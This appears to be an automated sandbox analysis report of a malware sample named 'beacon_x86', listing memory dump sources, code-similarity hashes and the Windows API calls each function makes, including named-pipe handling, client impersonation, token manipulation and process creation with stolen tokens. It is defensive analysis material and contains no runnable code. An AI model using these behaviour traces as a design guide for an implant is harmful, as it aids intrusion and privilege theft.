          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: signal
          • String ID:
          • API String ID: 1946981877-0
          • Opcode ID: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
          • Instruction ID: b56ee3113ec50b52d2ebb4f8ab71ee7f336b0eefb9bc163dcadcfca50a5a4408
          • Opcode Fuzzy Hash: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
          • Instruction Fuzzy Hash: 153121B01046008AE7206FA6864C32F76D0AB45328F154B6FE9E4EB3D1CBFDC985971B
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
          • String ID:
          • API String ID: 3886058894-0
          • Opcode ID: fc4aebe1cb34a72d3de3024db9cb425edac2f1df6bf6b8858243bc231b182162
          • Instruction ID: 545dfa2d2fbfacd36a67fb833037c7cd2b83de14fa4ce61e226090d79a24b1e7
          • Opcode Fuzzy Hash: fc4aebe1cb34a72d3de3024db9cb425edac2f1df6bf6b8858243bc231b182162
          • Instruction Fuzzy Hash: F6519771A40205EBCB219F69C84C5AEBBB5EF41320F18C65AF46D92191FB309E51EF71
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$_malloc$_rand
          • String ID:
          • API String ID: 2453798774-0
          • Opcode ID: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
          • Instruction ID: 2537d77829da40f82ac6f061b41036c4293bbe7e37b8e5bf98343f7cc2f9bb85
          • Opcode Fuzzy Hash: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
          • Instruction Fuzzy Hash: B6513830A00605BFDB119F78EC55BEE7BB8DF5A300F188095F884AB256EA35DE4587B4
          APIs
          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000), ref: 00D669DF
          • GetLastError.KERNEL32 ref: 00D669EC
          • WaitNamedPipeA.KERNEL32(?,00002710), ref: 00D66A01
          • Sleep.KERNEL32(000003E8), ref: 00D66A0E
          • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 00D66A58
          • GetLastError.KERNEL32 ref: 00D66A62
          • DisconnectNamedPipe.KERNEL32(?), ref: 00D66A9C
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleSleepStateWait
          • String ID:
          • API String ID: 3284586969-0
          • Opcode ID: 55e65ad271494a3971001e3fc1ef27d7b61aa9f56bc3ec7e6cb25b09f5145139
          • Instruction ID: 5d81bebe430e1f6bc318f1b2bb2c8bc1028a50ef1b83a23c456b7f3e09a5a20c
          • Opcode Fuzzy Hash: 55e65ad271494a3971001e3fc1ef27d7b61aa9f56bc3ec7e6cb25b09f5145139
          • Instruction Fuzzy Hash: 7C21D3316503047BFB116BF8EC8AB7D7AADEB04720F284426FA06F61D0DA71D84047B2
          APIs
          • GetLastError.KERNEL32 ref: 00D6D68B
          • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 00D6D6A9
          • GetLastError.KERNEL32 ref: 00D6D6B3
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast$OpenProcessToken
          • String ID:
          • API String ID: 2009710997-0
          • Opcode ID: 5fc7ae229c4fffb07eb5816caec24a4d1d2595433649b32867b14dfd2315ca77
          • Instruction ID: 727921c288380dd8d2a30061c6ae02959d77dec5d237ac8a4f6c8419be7efc41
          • Opcode Fuzzy Hash: 5fc7ae229c4fffb07eb5816caec24a4d1d2595433649b32867b14dfd2315ca77
          • Instruction Fuzzy Hash: F3216F76F50204BBF7116BE4EC4AF7A766DEB04B49F1C0125F605D1191E6788D109772
          APIs
          • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00D678B2
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D678D5
          • send.WS2_32(?,00000000,?,00000000), ref: 00D678E9
          • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 00D678F3
          • Sleep.KERNEL32(000003E8), ref: 00D67905
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLastSleepselectsend
          • String ID: d
          • API String ID: 3306477828-2564639436
          • Opcode ID: 7f2efbc10f13a19cfdf05bb75137aea3162443b35a073f673eb8f9e54f74962f
          • Instruction ID: 214eccfb405780931273cf4558abeeaf6f791fabf7e28c79aac850a667284a39
          • Opcode Fuzzy Hash: 7f2efbc10f13a19cfdf05bb75137aea3162443b35a073f673eb8f9e54f74962f
          • Instruction Fuzzy Hash: 3411907180020CABDB219F64DC85BD977B8EB04314F1005A7E605E21A0D7B59ED18FA0
          APIs
          • _memset.LIBCMT ref: 00D6312F
          • GetLastError.KERNEL32 ref: 00D63142
          • ReadFile.KERNEL32(?,00000001,?,00000000), ref: 00D63170
          • ImpersonateNamedPipeClient.ADVAPI32 ref: 00D63180
          • GetCurrentThread.KERNEL32 ref: 00D63195
          • OpenThreadToken.ADVAPI32(00000000), ref: 00D6319C
          • DisconnectNamedPipe.KERNEL32(00D95024), ref: 00D631B0
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipeThread$ClientCurrentDisconnectErrorFileImpersonateLastOpenReadToken_memset
          • String ID:
          • API String ID: 1184232734-0
          • Opcode ID: 625c1e664754c733d4722d87c4dfee9a2e0e4eacd2c52f0fa38f6c2a801f70a0
          • Instruction ID: f98e03205d366761067a9179ed126bf9a46f692e78baf179a3173217cecbe5bc
          • Opcode Fuzzy Hash: 625c1e664754c733d4722d87c4dfee9a2e0e4eacd2c52f0fa38f6c2a801f70a0
          • Instruction Fuzzy Hash: DD118271A00309AFEB119F68ED89E6A37BCEB05745F084072B604D6269D738CE449BB1
          APIs
            • Part of subcall function 00D694B4: GetCurrentProcess.KERNEL32(?,00D6547C,?,00D654D4), ref: 00D694C0
          • GetLastError.KERNEL32(?,00000000,?,?), ref: 00D6365F
          • _malloc.LIBCMT ref: 00D636CA
          • _memset.LIBCMT ref: 00D636DB
          • _memset.LIBCMT ref: 00D6370C
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D6373C
          • _memset.LIBCMT ref: 00D63751
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$ErrorLast$CurrentProcess_malloc
          • String ID:
          • API String ID: 2196066725-0
          • Opcode ID: cc4ea8e739f5a0e58af20b2ccdcdbc6745d36b0234445b6cdb309f251d232e28
          • Instruction ID: 3d9bbe62ed52b21f1a5c720df2632360466f30b65ef9cae01ca5018cacfe8013
          • Opcode Fuzzy Hash: cc4ea8e739f5a0e58af20b2ccdcdbc6745d36b0234445b6cdb309f251d232e28
          • Instruction Fuzzy Hash: 9541AEB6A00105BFEB00ABE8DC02ABE77BDEF04710F180065FA08E9192FB359A519775
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLastSleep$BuffersDisconnectFileFlushNamedPipe
          • String ID:
          • API String ID: 1974096663-0
          • Opcode ID: b9e6d7f8b7e469a4c56f005e7089357b16c487a24f9cdd1f59ab168b07717367
          • Instruction ID: 9fef6ecb5b2ce39dd7d8b7f0db388ac292e13e0fabe65f2f4318c4f43a5e5f30
          • Opcode Fuzzy Hash: b9e6d7f8b7e469a4c56f005e7089357b16c487a24f9cdd1f59ab168b07717367
          • Instruction Fuzzy Hash: 12311E72D0021DAFEB01EBE4DC89EEEB778EB14710F144062E905E6250DB71AE49DBB1
          APIs
          • __time64.LIBCMT ref: 00D6BB28
            • Part of subcall function 00D78E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D6BB2D,00000000,00000080,?,?,?,00D603F0,?,00000000,00000000,00000000,00000000), ref: 00D78E99
            • Part of subcall function 00D78E8E: __aulldiv.LIBCMT ref: 00D78EB9
            • Part of subcall function 00D77C0A: __getptd.LIBCMT ref: 00D77C0F
          • _malloc.LIBCMT ref: 00D6BB71
          • _memset.LIBCMT ref: 00D6BB8F
          • _strtok.LIBCMT ref: 00D6BBB4
          • _strtok.LIBCMT ref: 00D6BBD7
          • _strtok.LIBCMT ref: 00D6BBE6
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _strtok$Time$FileSystem__aulldiv__getptd__time64_malloc_memset
          • String ID:
          • API String ID: 3072773955-0
          • Opcode ID: 4c8f8e739990ee379dba2d1cf3edea7c737eba4bbc833876df277790f507886d
          • Instruction ID: 88a7a0d1c436ec7e95c3cbbc02477ccb5f8901f9a2c672b9f111edfe239266dd
          • Opcode Fuzzy Hash: 4c8f8e739990ee379dba2d1cf3edea7c737eba4bbc833876df277790f507886d
          • Instruction Fuzzy Hash: 1F21D1B11047056FD729DF3CD886AB7BBE8EB05320B00446EF89AC7245EB31E9098B71
          APIs
          • _memset.LIBCMT ref: 00D64EFC
          • _memset.LIBCMT ref: 00D64F08
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650C4
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650CF
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650DB
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650E6
            • Part of subcall function 00D65072: _rand.LIBCMT ref: 00D65144
          • __snprintf.LIBCMT ref: 00D64F59
          • __snprintf.LIBCMT ref: 00D64F71
          • _memset.LIBCMT ref: 00D64F90
          • _memset.LIBCMT ref: 00D64F9B
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$__snprintf_malloc$_rand
          • String ID:
          • API String ID: 1876596931-0
          • Opcode ID: cce1e1509f504b0f6cc4662c703f403171f67815652621ef42ac83140a419f6b
          • Instruction ID: 7f6d705f0b06df3fbfc42b3cb1313fb26bbd213981e0afa3432ae324d28e0361
          • Opcode Fuzzy Hash: cce1e1509f504b0f6cc4662c703f403171f67815652621ef42ac83140a419f6b
          • Instruction Fuzzy Hash: D2215872501100BBDF25AF14DC82F5B3B69EF91710F248095FE046B296E671EE21CAB5
          APIs
          • _memset.LIBCMT ref: 00D6CF89
          • _memset.LIBCMT ref: 00D6CF97
          • _memset.LIBCMT ref: 00D6CFA5
          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 00D6CFC2
          • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00D6CFF1
          • __snprintf.LIBCMT ref: 00D6D013
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$AccountInformationLookupToken__snprintf
          • String ID:
          • API String ID: 2009363630-0
          • Opcode ID: e50347e6bd1e33cefeb576eadbabec640bdae93920ce3208dee02c2e6e64ae31
          • Instruction ID: 19e6c57b3f1534ff696a128031149c240cec7f3e39e9f5d9ae705c107f85f391
          • Opcode Fuzzy Hash: e50347e6bd1e33cefeb576eadbabec640bdae93920ce3208dee02c2e6e64ae31
          • Instruction Fuzzy Hash: 9D21FCB291121CBADB11DF90DC85EEF77BCEB04744F0488BAB615E2141E674AB848B75
          APIs
          • _memset.LIBCMT ref: 00D6389E
          • _memset.LIBCMT ref: 00D638BA
          • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C3E8296A,83FFFFDB), ref: 00D63946
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$CreateProcessTokenWith
          • String ID: system32
          • API String ID: 355399865-3483537008
          • Opcode ID: b55e6611d9dd14d5a3083f7509244ccb8567f399a027d50656637612e9cb9096
          • Instruction ID: 688c9c009741edde6b29203e7ef3fc6e61ef4f65c8d137e8ef9b0004fffb3658
          • Opcode Fuzzy Hash: b55e6611d9dd14d5a3083f7509244ccb8567f399a027d50656637612e9cb9096
          • Instruction Fuzzy Hash: 23510772604305AFD7219FA8DC85EAB77E9EF95700F18082AF589C3251E771DA088F72
          APIs
          • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,00D63994,C3E8296A,83FFFFDB,00D8A190,00D63ACB), ref: 00D63795
          • GetLastError.KERNEL32 ref: 00D637A7
          • _memset.LIBCMT ref: 00D637F0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateErrorLastLogonProcessWith_memset
          • String ID: system32
          • API String ID: 2584212486-3483537008
          • Opcode ID: 251e63137930261fe7bc4555151b4f49d5251ba905ae28ffa97f8563d0cb47bb
          • Instruction ID: 82fc943b23b9138e04d414e887422abd4a09dfa9a3f63db9592b08a8663d5c0b
          • Opcode Fuzzy Hash: 251e63137930261fe7bc4555151b4f49d5251ba905ae28ffa97f8563d0cb47bb
          • Instruction Fuzzy Hash: 05312876900210AFDB125F64EC09FE63BB9EF49300F188465F989DB261E671DA14CBB0
          APIs
          • htonl.WS2_32(00000000), ref: 00D62982
          • htonl.WS2_32(?), ref: 00D6298D
          • _malloc.LIBCMT ref: 00D629A4
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D629FD
            • Part of subcall function 00D6B0FD: __snprintf.LIBCMT ref: 00D6B13C
            • Part of subcall function 00D6B0FD: __snprintf.LIBCMT ref: 00D6B14E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
          • String ID: zyxwvutsrqponmlk
          • API String ID: 1734027086-3884694604
          • Opcode ID: 0fcaffc6e3bce3f89af16c2316c950781937f99509708f1df781b00d704622f7
          • Instruction ID: a799112727418174fa24ba33442724eb0e68a436ef2e80d86b3e09ac77a2aa46
          • Opcode Fuzzy Hash: 0fcaffc6e3bce3f89af16c2316c950781937f99509708f1df781b00d704622f7
          • Instruction Fuzzy Hash: F5213A62E4060177D7203AB59C87B7F7FD8DF85330F24057AF959E7283EA24890146B5
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintfhtonl
          • String ID:
          • API String ID: 3121112697-0
          • Opcode ID: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
          • Instruction ID: ac952cf596975460d39df2b56b69c32cb92e4dc34351f9bef7765b13b3d011dd
          • Opcode Fuzzy Hash: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
          • Instruction Fuzzy Hash: E8118176801118BBDB11AFA4CC42EEF7B6DEF44350F144466F90496102F6309B01CBB5
          APIs
          • _memset.LIBCMT ref: 00D64FC6
          • _memset.LIBCMT ref: 00D64FD2
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650C4
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650CF
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650DB
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650E6
            • Part of subcall function 00D65072: _rand.LIBCMT ref: 00D65144
          • __snprintf.LIBCMT ref: 00D6502E
          • _memset.LIBCMT ref: 00D6504C
          • _memset.LIBCMT ref: 00D65057
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$_malloc$__snprintf_rand
          • String ID:
          • API String ID: 4266533377-0
          • Opcode ID: cde045e9b4a518eb2f0bfecb2e13c26cd05ba3549c091f30445d61c446199dd3
          • Instruction ID: c3f52078dd835b4064d8a97591e241135356fe9bfea44f78093953094779060a
          • Opcode Fuzzy Hash: cde045e9b4a518eb2f0bfecb2e13c26cd05ba3549c091f30445d61c446199dd3
          • Instruction Fuzzy Hash: 9921C071900111BBCF25AF14DC46E4B3B65EF91710F248090FD046B29AE671EE61C7F1
          APIs
          • GetLastError.KERNEL32(?,00D662A9,00D627B2,00000000,?,00D627B2,?), ref: 00D661EC
          • WaitNamedPipeA.KERNEL32(00D627B2,00002710), ref: 00D66201
          • SetNamedPipeHandleState.KERNEL32(?,00D627B2,00000000,00000000,?,00D662A9,00D627B2,00000000,?,00D627B2,?), ref: 00D6622F
          • DisconnectNamedPipe.KERNEL32(?,?,00D662A9,00D627B2,00000000,?,00D627B2,?), ref: 00D6623B
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipe$DisconnectErrorHandleLastStateWait
          • String ID:
          • API String ID: 2058620245-0
          • Opcode ID: 46a7405187cf3e1298ddb3f783bd20a30979b81d04f47fd49950a4b8ea0e59d3
          • Instruction ID: 13dab11660ddce4174ab2ec367e8cd27b9b1bf99633e76f3769c283d39aa0dac
          • Opcode Fuzzy Hash: 46a7405187cf3e1298ddb3f783bd20a30979b81d04f47fd49950a4b8ea0e59d3
          • Instruction Fuzzy Hash: 991161B1220210BFFB115B68DC19F7B3AADEB4A714F100566B906D61A4E670DD409B75
          APIs
          • __getptd.LIBCMT ref: 00D7FB2A
            • Part of subcall function 00D7C797: __getptd_noexit.LIBCMT ref: 00D7C79A
            • Part of subcall function 00D7C797: __amsg_exit.LIBCMT ref: 00D7C7A7
          • __amsg_exit.LIBCMT ref: 00D7FB4A
          • __lock.LIBCMT ref: 00D7FB5A
          • InterlockedDecrement.KERNEL32(?), ref: 00D7FB77
          • InterlockedIncrement.KERNEL32(00D94B98), ref: 00D7FBA2
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
          • String ID:
          • API String ID: 4271482742-0
          • Opcode ID: 3248305179616a33d10f58f7afbdab3b34a640fe8f2d7e316897787e78d71c5f
          • Instruction ID: 82646945bde1b9d588b473eee7cdedf1e0fff0c271368bab8ce6308782bb646e
          • Opcode Fuzzy Hash: 3248305179616a33d10f58f7afbdab3b34a640fe8f2d7e316897787e78d71c5f
          • Instruction Fuzzy Hash: C0018032905711EBDB31AB68D856B5DB760FF04724F198026E81CA7381EB38E941CBF6
          APIs
          • _malloc.LIBCMT ref: 00D6DC76
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _malloc.LIBCMT ref: 00D6DC83
          • _malloc.LIBCMT ref: 00D6DC9E
          • __snprintf.LIBCMT ref: 00D6DCB1
          • _malloc.LIBCMT ref: 00D6DCD0
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$AllocateHeap__snprintf
          • String ID:
          • API String ID: 3929630252-0
          • Opcode ID: 46a10f34c61c9f158cd838bfac093e5130d5b1043cba3970bd40d9bc6f0fa515
          • Instruction ID: c0d451d105c0ee3162f752e5ee9830a06e9001cf67445b89e0f9adfcfa3c6565
          • Opcode Fuzzy Hash: 46a10f34c61c9f158cd838bfac093e5130d5b1043cba3970bd40d9bc6f0fa515
          • Instruction Fuzzy Hash: 6B016D709043056FDB14AF79D986E56BBE8EF44754B00C829F48DCB241EA71D9058BB0
          APIs
          • __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D798AA: __mtinitlocknum.LIBCMT ref: 00D798C0
            • Part of subcall function 00D798AA: __amsg_exit.LIBCMT ref: 00D798CC
            • Part of subcall function 00D798AA: RtlEnterCriticalSection.NTDLL(?), ref: 00D798D4
          • ___sbh_find_block.LIBCMT ref: 00D7774B
          • ___sbh_free_block.LIBCMT ref: 00D7775A
          • HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
          • GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
          • String ID:
          • API String ID: 2714421763-0
          • Opcode ID: 6ce2192171226e7b61eec90b42679239f748312574d3ec5f9311f2350a1a71bd
          • Instruction ID: ede6c3cca426c0dfeaf37b295c8f8927b0828aa93879dd175954d9fcfe1303e5
          • Opcode Fuzzy Hash: 6ce2192171226e7b61eec90b42679239f748312574d3ec5f9311f2350a1a71bd
          • Instruction Fuzzy Hash: 7B018632809311AAEF247FB9DC4AB5E7664EF01721F25C619F51CA61D1FB3889408BB5
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __snprintf$_strncmp
          • String ID: abcdefghijklmnop
          • API String ID: 3493850238-2486878355
          • Opcode ID: 4e1198a48f92e5905a7723c2e6905b96d3e9f29e0da5bbaa08abe818fbc922e1
          • Instruction ID: 9c674bbe0571e5d6bf8951c69bf8bfcd58f932b4857b449fb9f470301739735e
          • Opcode Fuzzy Hash: 4e1198a48f92e5905a7723c2e6905b96d3e9f29e0da5bbaa08abe818fbc922e1
          • Instruction Fuzzy Hash: 8741B172900609BFEB01DEB8D9418EFB7B9DF49354B104932EA05E7151FB35AF098AB1
          APIs
          • GetCurrentProcess.KERNEL32(00D659A9,?,00D659A9,00000000), ref: 00D6CAAF
          • GetCurrentProcess.KERNEL32(00D659A9,00000000,?,00D659A9,00000000), ref: 00D6CACA
          • UnmapViewOfFile.KERNEL32(00D659A9,?,00D659A9,00000000), ref: 00D6CAD9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentProcess$FileUnmapView
          • String ID: 0-v
          • API String ID: 1078562510-620404996
          • Opcode ID: a8878e471d6c314100dd7d8cbf16bbbfc6d6a2f57ec12e7aad5e86f85094db18
          • Instruction ID: ac169ef7cee2e01c8e6579b94d75985d79177178e1497c1d971d51675ab90c35
          • Opcode Fuzzy Hash: a8878e471d6c314100dd7d8cbf16bbbfc6d6a2f57ec12e7aad5e86f85094db18
          • Instruction Fuzzy Hash: 6AF03C719503099BDB24DFE9EC0857A3BA9FB15760B18542AE849C3760E7349880DB74
          APIs
          • GetLastError.KERNEL32 ref: 00D61036
            • Part of subcall function 00D6C9B2: GetCurrentProcess.KERNEL32(?,00000000,00000000,?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?,00D6596B), ref: 00D6CA21
          • _memset.LIBCMT ref: 00D611A8
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentErrorLastProcess_memset
          • String ID:
          • API String ID: 652633832-0
          • Opcode ID: 5e59a5eb116a21072079c670acae980d69bf9e0a117743fe9dee8025ec4ae3e4
          • Instruction ID: 5cee0d3b52ae1c24a33967174b2957f304be2e9b04028867cdb82ac82952a402
          • Opcode Fuzzy Hash: 5e59a5eb116a21072079c670acae980d69bf9e0a117743fe9dee8025ec4ae3e4
          • Instruction Fuzzy Hash: 08C1AAB6A107059FEB20CF69CC81A5777E4FF88304B18893EE586C6A52E735F8558B30
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
            • Part of subcall function 00D78218: __fsopen.LIBCMT ref: 00D78225
          • _fseek.LIBCMT ref: 00D63D43
            • Part of subcall function 00D78852: __lock_file.LIBCMT ref: 00D78861
            • Part of subcall function 00D78852: __ftelli64_nolock.LIBCMT ref: 00D7886E
          • _fseek.LIBCMT ref: 00D63D5C
            • Part of subcall function 00D78BE3: __lock_file.LIBCMT ref: 00D78C2E
            • Part of subcall function 00D78BE3: __fseek_nolock.LIBCMT ref: 00D78C3E
          • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 00D63D89
          • _malloc.LIBCMT ref: 00D63DA3
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
          • String ID:
          • API String ID: 73014519-0
